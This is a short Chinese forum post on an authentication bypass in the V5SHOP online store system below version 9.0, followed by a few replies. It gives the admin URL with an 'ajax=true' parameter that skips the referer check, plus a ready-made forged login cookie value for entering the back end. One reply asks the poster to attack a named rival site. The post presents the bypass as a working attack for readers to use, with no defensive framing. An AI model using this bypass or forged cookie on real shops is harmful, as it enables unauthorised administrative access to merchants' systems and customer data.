V5SHOP网店系统< 9.0后台认证绕过
程序后台的访问控制:1 获取cookie,使用秘钥解密。确定是否登录
2 监控referer,不过请求中带ajax=true,即可绕过限制
所以我们可以伪造一份加密的cooke,并携带ajax=true去直接访问后台
访问URL:
www.xxxx.com/weblogin/index.aspx?ajax=true
伪造cookie:
V5ShopLoginID=Z1zZmWmBQL7kg6bn1sIVSbI1tdLbyYJnhapJnu3MQKs=
加密cookie生成工具:
作者:zpino 谢谢分享~ {:soso_e136:} 跪求楼主日了小TAO宝~~太可恶了 {:soso_e140:}小组核心老是灌水
页:
[1]